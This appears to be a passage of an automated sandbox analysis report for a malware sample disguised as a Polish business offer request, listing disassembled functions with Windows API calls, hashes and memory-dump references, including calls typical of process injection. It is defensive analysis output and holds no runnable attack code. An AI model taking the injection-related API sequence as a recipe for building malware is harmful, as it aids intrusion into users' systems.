                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                                                                                                        • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                                                                                                      • __lock_file.LIBCMT ref: 00414EE4
                                                                                                                                                                                                                                                        • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                                                                                                                                                                                                      • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 717694121-0
                                                                                                                                                                                                                                                      • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                                                                                                                                                      • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 004098F6
                                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00409901
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message$DispatchTranslate
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1706434739-0
                                                                                                                                                                                                                                                      • Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                                                                                                                                                                                      • Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 004098F6
                                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00409901
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message$DispatchTranslate
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1706434739-0
                                                                                                                                                                                                                                                      • Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                                                                                                                                                                                                      • Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03EDF71D
                                                                                                                                                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03EDF741
                                                                                                                                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03EDF763
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2059113429.0000000003EDD000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDD000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3edd000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2438371351-0
                                                                                                                                                                                                                                                      • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                                                                                                                                                      • Instruction ID: 72fb10a191f6847f52d0616f51186ac625cb9663daec7e6b06e5ce98e1acbd89
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8612C024E24658C6EB24DF64D8507DEB232EF68300F1061E9910DEB7A5E77A4F81CF5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                      • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 3961a28c277083be2aa3af59c567e925e17c7cc277bd15d9b1b027d84e9ba52e
                                                                                                                                                                                                                                                      • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3961a28c277083be2aa3af59c567e925e17c7cc277bd15d9b1b027d84e9ba52e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00452DE9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Exception@8Throw_malloc_memsetstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2751567902-0
                                                                                                                                                                                                                                                      • Opcode ID: f72b79abc5de27323e3d3e6c8f936525bfb853d4af2f66d01fdfa3e888ef2691
                                                                                                                                                                                                                                                      • Instruction ID: c2a3b2dfb6b158e2ccc1f5ef864fc4bb8e06cf4791c66092a4707409b716d428
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f72b79abc5de27323e3d3e6c8f936525bfb853d4af2f66d01fdfa3e888ef2691
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1101D7B92002409FD350EF1DC481B56B7E1FFA9304F25C95EE2898B392D776E846CB95
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ProcWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 181713994-0
                                                                                                                                                                                                                                                      • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                                                                                                                                                      • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CreateHeap
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 10892065-0
                                                                                                                                                                                                                                                      • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                                                                                                                                                      • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ProcWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 181713994-0
                                                                                                                                                                                                                                                      • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                                                                                                                                                      • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __wfsopen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 197181222-0
                                                                                                                                                                                                                                                      • Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                                                                                                      • Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 03EDFF01
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2059113429.0000000003EDD000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDD000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3edd000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                                                      • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                                                                                                                      • Instruction ID: a81e32b4fdaa6577f6dd53942ebe1544bfc04afc4949f48bdae2d42ca580943f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26E0BF7494410DEFDB00EFA8D5496DE7BB4EF04301F1006A1FD05E7681DB309E558A62
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 03EDFF01
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2059113429.0000000003EDD000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EDD000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3edd000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                                                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                                                      • Instruction ID: 8360447405d97ad7f841cbc6a3a4cc812796bb3b114b4f9ef00af7e78bb87f66
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BE0E67494410DDFDB00EFB8D5496DE7FB4EF04301F1002A1FD01E2281D7309D508A62
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                                                                                                                                                                                      • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                                                                                                                                                                                      • SendMessageW.USER32 ref: 0047C2FB
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$State$LongProcWindow
                                                                                                                                                                                                                                                      • String ID: @GUI_DRAGID$F
                                                                                                                                                                                                                                                      • API String ID: 1562745308-4164748364
                                                                                                                                                                                                                                                      • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                                                                                                                                                      • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(00000000,?,?,004448AF,?), ref: 004375B3
                                                                                                                                                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004375D8
                                                                                                                                                                                                                                                      • IsIconic.USER32(?), ref: 004375E1
                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000009,?,?,004448AF,?), ref: 004375EE
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 004375FD
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00437615
                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00437619
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437624
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437632
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 00437638
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,004448AF,?), ref: 0043763E
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00437645
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437654
                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0043765D
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043766B
                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 00437674
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437682
                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 0043768B
